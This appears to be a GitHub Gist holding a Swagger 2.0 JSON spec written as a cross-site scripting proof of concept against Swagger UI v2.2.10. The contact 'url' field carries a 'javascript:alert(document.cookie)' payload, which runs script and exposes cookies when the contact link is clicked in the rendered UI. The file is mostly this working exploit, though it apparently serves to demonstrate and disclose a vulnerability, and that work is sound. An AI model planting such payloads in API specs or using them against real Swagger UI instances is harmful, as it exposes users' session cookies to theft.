Last active
April 17, 2023 09:12
-
-
Save edoardottt/197f4bc482eddb263c47b525268d1628 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"swagger" : "2.0", | |
"info" : { | |
"version" : "1.0.100", | |
"title" : "Swagger UI v2.2.10 XSS POC", | |
"description" : "Swagger UI v2.2.10 XSS POC", | |
"contact" : { | |
"name" : "edoardottt", | |
"url" : "javascript:alert(document.cookie)", | |
"email" : "[email protected]" | |
}, | |
}, | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment